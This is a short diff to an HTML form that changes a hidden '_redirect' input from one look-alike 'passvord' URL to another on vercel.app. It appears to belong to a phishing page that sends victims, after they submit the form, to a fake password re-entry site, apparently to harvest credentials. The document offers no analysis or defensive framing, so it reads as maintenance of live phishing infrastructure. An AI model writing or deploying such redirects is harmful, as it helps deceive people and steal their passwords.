--- a/request.html
+++ b/request.html
@@ -20,7 +20,7 @@
       <input
         type="hidden"
         name="_redirect"
-        value="https://re-enter-passvord.vercel.app"
+        value="https://re-enter-your-passvored-g.vercel.app/"
       />
       <div id="root">
         <div>
